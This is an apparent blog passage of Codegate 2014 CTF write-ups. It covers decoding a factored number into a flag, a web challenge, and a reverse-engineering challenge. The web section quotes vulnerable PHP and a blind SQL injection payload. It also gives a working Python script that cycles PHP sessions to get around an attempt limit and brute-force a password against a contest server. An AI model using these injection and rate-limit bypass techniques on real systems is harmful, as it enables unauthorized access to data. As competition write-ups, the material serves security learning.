 44862539440899824953544299808868612457775933472138196224610453
 11530583422527070497633775318179809828500606697569377465799799
 54471406484189708077975403022158460758575900267409730712997929
 47231019376815728466310052966308682895184358544097519342740100
 57110112921490461877951204535537569391909273437314677447327866
 52201447146133572786175423917384273338870515010134540307199064
 72130560184292107366400427201842266741742616726659163475848294
 29106509174585334314039204410435021019531690830894740406966589
 64446806141569970688313113713675854861252572450983082228174556
 69226435385032269967652101467283370112904695529770227827569492
 33024024077309218063651088059764601517090086367283292989275102
 12493678669330884604031229350765021136211996328384942775694289
 22846635710532840466490571868584890022175104900152707209095045
 34718967927081692301151787124429068338106088810324757072683083
 35917432118141540657580628492535966518129582795502526236826218
 72636229125218116174003193364505606435854332737466252942091254
 32024201322723281187376104926062606799629068739639999598033235
 69265154282915206295382484585072950005493453636988290143769751
 55567039758627718923752144724061268577228842873002480301205693
 38711682393363911077831374245727477116622310174489168697283823
 27909944203175197657028404534911769099866852844794777786503985
 73796522979517352844682755099840225582812967180323674510772497
 39959737862418053213242683662600030016014696788538709020853185
 43115850894875821249106576711256811644556760629140853689288951
 21678087675344314006230531023072480157470134102402038891626111
 99059386317964719719430596483266433739774806584001249029864970
 77850563444136255262721992437120425927933609150628040374630569
 40092977679992449303976426852566163575262373841796566356073988
 88163263542920360147457511602729447257174644336814131943335128
 34561693324629530634730312186987935370530286632627750769461711
 14115969666176076032180757871072768553041435994226444214246975
 37043385747508966834236761124451511929284080094580986762994035
 27564636085397648925518549585885348988931501715248563068096900
 70189393644571374555366996381528901138540867350905163837456503
 65996709940084553531543728970279642261703834303025755114291439
 41088976046130621734044518761352562303672111346564531852804468
 65731868864416007534066552997480510402908524593887856902631336
 10700499903575211931579729772601380004944131156075381050290959
 51962559353898651470522486361543945405596432840740942593481764
 11101470929604675803135836523242158769878315933653829981800890
 63149180359780299109632005975607087374655278220823470457068083
 03778761408448803538143970931834683393867466135992802049435054
 24521179697106162112073151704069482267215106754059695736784871
 98759762772429761365086202092257924498485785670048217238102203
 43521615746529733701191110045173140646184589892589851532859044
 63454016704566191713113410448111674445957043213244292933040073
 73352388523065506964470775567357902794060723997781235661282820
 15132637075521158967198168773251488380162080715125262642018623
 21502987667554698788631483417433992007047091285071034182872233
 07403454997176066022014156183455637695078970971099199071751418
 00255054276500946778638100304720183447775877471755171812481380
 59677133337326604540992222461259014828648752413330449609350106
 01198311943794604555937612785604132687582104298367783177330669
 81440814715617755380107621863593677229811877190979533649979538
 17565814652133206971957145104230807190637213544770944356998510
 64640130739959546946185142406806904821515707159367004173408608
 59833504250181347199434224557171466566443457175989423505312498
 24396390974689420782783445334849757048789810439651838468556668
 17971325941707786303007910180554945017607889503296339162498506
 16139331054727761885847030868137379220914225158030232965122083
 40256704000188321265281828557448765848837632675209827568269451
 88756911432877186024613986724724263309243765478717498181675792
 05389682428143493080662695837909019092902628621269237105031754
 38609633789556447121705477917482339471706209257654609177238153
 28561499584062999518970999204358574593278983749769705279990843
 38915939359460103277345023258957064367368841958337348249848641
 02087587230185526840178298817653370531034053455957470606087465
 92047799033545535323323416285625642700730808268433166815168232
 78426731506030343515592777926053981892594894802165187253762883
 34868268348570017754105979511855089605501008638163758742842912
 48738921833661187136231835025113086349653981912663616038580622
 78615091399606418777669943990895203173667273070471680669721447
 67361249763241371479782769018332203208637205331604578962561327
 62395086892864019757980160030219013071565324847340863727100742
 90597806782507276969657464144407942727660195994192833864939698
 37750585801041413334922419378293939288142128617565224786556809
 94028540328636383291390986473960160453241102609659027111767363
 04962393313342346878209160265866969568264521177586407295779829
 42673897219879354202578191811711416373099504888041307802839326
 88709774799771471191989052945844827855291336019143486167915296
 78064625387471028762142031487405659095441760263553293687046561
 40485967875100070448057501743464257682809593131716592468316347
 71484044861414326371996645730705757197037506888639275083892235
 85520630883294317486757026963289630103118738425289976300685721
 48864052532955749639857850402390454276254010894993818634719054
 88679698133106256645216309743253158144756853070178868648341170
 11236758894049552412698397893222034548911470223747913485314815
 33846589798803149523298502206277044838284947388921860364335609
 72559786177126070872700400776103169075283511078045809054886604
 34130464473176505935004488899580120173676626706902885861939676
 01096142063621588694572119287468055538540020153480154082267598
 01554360132814697619487458634824765431328126755920330108676508
 45064517020413665101428136151268001931231081632555609781439886
 34151295019529646576068898435928694157329023493602556554606569
 54768991087162625695917087583295743908003608879382759551613832
 52955768348467185613436256942272261897441414108928973613634924
 98601435154724319311322398230175303139799510637522184849616201
 82500562235443529927504186742977061089269588885630204541640237
 13947843035199231029896440525636685983520089791342737640805586
 82620342094716132266784643783090442776332335232204670330969367
 71786692718068651613151778559440765162572899666509915441275435
 17380075468616451790023249167153411548381829093928652419620481
 34803676131455913336054839873070282594637644965905893293578984
 70052054178727546154159828474770327394401935525910019340495286
 98134628927924829825481647208778492862470164656506532800683232
 93971597829308769649523791284101119320033295655826038829116884
 56093740465180242364409036410102786869758101055881811989874033
 36717015537953101223054169140402668460054808409956970960302098
 33732373924344007102454946858503389325685887520454564488363424
 15137838740459290220390786551930191873720409673853625406891479
 65492715178122052514861492747396923891489329261196118900142022
 12082357423814719618543767635794433685623288104499782212028155
 72860659715236151717250979625371128159463913028000997253291674
 72372508369958839592859493317328517203426376226638361707098475
 93042671045184457513211466840778238822345568419215424188609496
 07329098304020732239102486169671121747247644724626256816889362
 82120075432265391924942624467172775218156228724917473005448552
 54942626850563853226285476091609430364194681390386687663924533
 82148661604204550960267477585365154431248139681198008023392186
 95781361791948498452747127902802380675676654928692618234260053
 11203009106410649061150305960566125985049679978119414987004500
 31039384558786259715767675256958860052435642885845786998367847
 30973638349826858969241321032537215516619791899866430301364689
 55876685973094710331666364438111002703959407331670784751883336
 99331574882872567826170713353358681631352934588923006641370680
 33907868157929796923713520243919115168532310540942527040672753
 16672177213337581686238164327259645002843809869188943553789522
 19564657441771589676592938243415288179821913135870120803537626
 09446265701835500625870858753882792958540505735422484053255441
 89186748470392392739788813463498554340216203509066251532422768
 69232985601360170446078307649336171355220352784129276359259785
 41631800883153344035638646397759181407339860016617419389340907
 00801401958662073898699369415568220585432131155953695318618899
 28411565059802748679637377474692600802359824949798086704767561
 01147687051031021484736937343575224770853493476090045636150249
 70014890887940655830976007119564373320968348183806894429661862
 69423854614258323783972411071242892149468095810470088075818178
 88670029688408012435551075866150304026102100313615782001575776
 12719715340710561572397671706034026801945462349871571855196008
 26151068844115075257345561470981741510741066696878002829505876
 28232515311825948616114493379871346981834192714448272660487864
 49537508605970173453436023679332662915793526971382510004685510
 37158361524246932161327340470665922268558194463606897361762364
 13979581030416005748358577153483215532580196846453448382526856
 54098719318628780749358138079159486518953386352662457870835745
 92563832494362662351885605188211934789455597316492270886257596
 00946801980349915477785568603733918737572693659121065920849504
 39764396282963469198175375586755798472315425371391554108834243
 32207052774255288482577966326689797460113866620417471902086961
 95007741294595865360437951910254909481033");

HashMap<BigInteger, String> f = new HashMap<BigInteger,String>();
 f.put(new BigInteger("2")," a");
 f.put(new BigInteger("3")," b");
 f.put(new BigInteger("7")," c");
 f.put(new BigInteger("13")," d");
 f.put(new BigInteger("29")," e");
 f.put(new BigInteger("59")," f");
 f.put(new BigInteger("127")," g");
 f.put(new BigInteger("241")," h");
 f.put(new BigInteger("487")," i");
 f.put(new BigInteger("971")," j");
 f.put(new BigInteger("1949")," k");
 f.put(new BigInteger("3889")," l");
 f.put(new BigInteger("7789")," m");
 f.put(new BigInteger("15569")," n");
 f.put(new BigInteger("31139")," o");
 f.put(new BigInteger("62297")," p");
 f.put(new BigInteger("124577")," q");
 f.put(new BigInteger("249181")," r");
 f.put(new BigInteger("498331")," s");
 f.put(new BigInteger("996689")," t");
 f.put(new BigInteger("1993357")," u");
 f.put(new BigInteger("3986711")," v");
 f.put(new BigInteger("7973419")," w");
 f.put(new BigInteger("15946841")," x");
 f.put(new BigInteger("31893713")," y");
 f.put(new BigInteger("63787391")," z");

for (Map.Entry<BigInteger, String> entry : f.entrySet()) {
 int count = 0;
 while (a.mod(entry. getKey()).equals(BigInteger.ZERO)) {
 count++;
 a = a.divide(entry. getKey());
 }
 if (count != 0) {
 System.out.println(entry.getValue() + " " + count);
 }

}

}

After execution, we get


u 7
l 3
e 2219
n 59
r 3889
m 971
g 13
f 2
i 487
h 127

At the moment, we don’t know the exponents for each position, but we can assume that they are ordered (starting with the smallest)
So let’s order the letter


f 2
l 3
u 7
g 13
n 59
h 127
i 487
m 971
e 2219
r 3889

The resulting word is flugnhimer, doesn’t seem to mean anything. But a letter can be used multiple time so we should look at the exponent.

But just typing flugnhimer in google gives the result, flugenheimer (NSFW), which was the flag

0

codegate 2014 Write-up: 120

February 28, 2014

The website for this challenge said “120 times left” and had only a password field and a submit button. Trying something random we get False als response, go back to the main page and see we now have “118 times left”, so each POST or GET to the page decreases the number by one.

The description also contained a link to the sourcecode of the index.php. First thing we notice is that we can easily do a SQL injection:

if (eregi("replace|load|information|union|select|from|where|limit|offset|".
"order|by|ip|\.|#|-|/|\*",$_POST['password'])){
   @mysql_close($link);
   exit("Wrong access");
}

$query = "select * from rms_120_pw where (ip='$_SERVER[REMOTE_ADDR]') and
(password='$_POST[password]')";
$q = @mysql_query($query);
$res = @mysql_fetch_array($q);

if($res['ip']==$_SERVER['REMOTE_ADDR']){
   @mysql_close($link);
   exit("True");
}

else{
   @mysql_close($link);
   exit("False");
}

Using a single qoute to escape the string, e.g. submitting ‘ or ”=’ will return True.  A lot of useful keywords are filtered and we only have a boolean output, so we have to guess the password char by char with the like operator: ‘ or password like ‘e%’ or 1=’

We can also see that if we used all our 120 attempts, a new password will be generated. The function RandomString() randomly selects 30 lowercase characters from the file smash.txt (an article from the magazine Phrack). So just guessing it seems quite unlikely, as we would have an average of only 4 guesses per character.

Still we did a quick frequency analysis of the article to improve our odds by trying the most common letters first. However as expected even with a bit of luck (lots of e’s and t’s) we only get like 15-20 characters at most. Looking back at the challenge description, the hover text states “You dont have enough arrows…”. So there must be a way to obtain more than 120 attempts!

This means back to the part with the session:

 if ($_SESSION['cnt'] > $max_times){
 unset($_SESSION['cnt']);
}

if ( !isset($_SESSION['cnt'])){
   $_SESSION['cnt']=0;
   $_SESSION['password']=RandomString();

   $query = "delete from rms_120_pw where ip='$_SERVER[REMOTE_ADDR]'";
   @mysql_query($query);

   $query = "insert into rms_120_pw values('$_SERVER[REMOTE_ADDR]',
'$_SESSION[password]')";
   @mysql_query($query);
}

$left_count = $max_times-$_SESSION['cnt'];
$_SESSION['cnt']++;

Looking closer we can see a fatal flaw in the approach used here: The IP and password are saved in the database, but the count (how many tries are left) is only tied to the PHP Session ID. So if we first request a lot of sessions and then start bruteforcing we can switch between sessions and start at “120 times left” again – with the same password still in the database! So basically we now have an arbitrary number of attempts :)

The last step was to go to auth.php and submit the current password to get the flag:
Congrats! the key is DontHeartMeBaby*$#@!

Our final code:

import requests

pw = ""
sessions = []
link = "http://58.229.183.24/5a520b6b783866fd93f9dcdaf753af08/"
chars = "etsoainrlcdxhfmpbuwgyvkjzq"

for i in range(10):
  s = requests.session()
  s.get(link)
  sessions.append(s)

for i in range(len(sessions)):
  count = 0
  s = sessions[i]

  while count < 120 - 26:

    for j in range(26):

      count += 1

      c = chars[j:j+1]
      query = "' or password like '" + pw + c + "%' or 1='"
      page = s.post(link, {'password': query})

      if page.text == "True":
        pw += c
        print pw
        break

    if len(pw) == 30:
      page = s.post(link + "auth.php", {'password': pw})
      print page.text
      exit()
0

codegate 2014 Write-up: dodoCrackme

February 26, 2014

The first challenge of the codegate 2014 ctf was a reversing challenge.
Linux file command showed us:

 crackme_d079a0af0b01789c01d5755c885da4f6: ELF 64-bit LSB executable,
 x86-64, version 1 (SYSV), statically linked,
 BuildID[sha1]=0xb300ef9227a8911db0d6aea538fe03fe4dfb20fe, stripped

Ok it’s a 64Bit ELF binary, which means no “F5 in IDA”. Opening with
IDA64, an alert popped up that there are more then 1000 Nodes to show. WTF?
After changing the node limit the graph showed a single extreme huge function.
After a quick look we noticed many syscalls and inc instructions and
no imports at all. In short the whole thing looked strange.
As there were no strings in it, we gave it a try and executed the file:

 $~/codegate2014$./crackme_d079a0af0b01789c01d5755c885da4f6
 root@localhost's password: test
 Permission denied (password).

It seems the code prints strings, which try to tell us it’s
establishing a ssh connection to localhost, which is just a fake. If there are
no strings in the code, they must be generated at runtime. That would
explain all those syscalls. So lets run it withing gdb and set a
breakpoint in the first node with some syscalls.

 (gdb) b *0x400328
 Breakpoint 1 at 0x400328
 (gdb) r
 Starting program: ~/codegate2014/crackme_d079a0af0b01789c01d5755c885da4f6
 root@
 Breakpoint 1, 0x0000000000400328 in ?? ()

As expected it really generates strings char by char at the first
syscall node. So the other node with syscalls must be the error message.
All syscalls are called with rax = 1 and rdi = 1, which writes to
stdout. But one syscall is called with rax = and rdi = 0, which is read
from stdin. Full information table here.

That should be the prompt which asks for the root password. The code
must check the input against something between the input syscall and the
output syscall.

 00000000004065AE                 mov     eax, 0
 00000000004065B3                 mov     edi, 0
 00000000004065B8                 mov     rsi, rbp
 00000000004065BB                 mov     edx, 1
 00000000004065C0                 syscall
 00000000004065C2                 lea     rbp, [rbp-8]
 

So we set a breakpoint at 0x4065C2 direct after the read syscall.
According to the system call table rsi points to the address where the
string is stored and rdx sets the read count.
After restarting the programm and hitting the breakpoint, we took a look at rsi:

 (gdb) x/20d $rsi
 0x7ffff7ff9b38: 116     0       0       0
 0x7ffff7ff9b48: 0       0       0       0
 0x7ffff7ff9b58: 72      0       0       0
 0x7ffff7ff9b68: 52      0       0       0
 0x7ffff7ff9b78: 80      0       0       0

116 is our first ‘t’, but hey whats that 72,52,80? After expanding the
scope we get: 72, 52, 80, 80, 89, 95, 67, 48, 68, 69, 71, 97, 84, 69,
95, 50, 48, 49, 52, 95, 67, 85, 95, 49, 78, 95, 75, 48, 82, 69, 52
After converting the hex values to a string we get
“H4PPY_C0DEGaTE_2014_CU_1N_K0RE4″ which is the flag, worth 200 points.

1
Get Adobe Flash player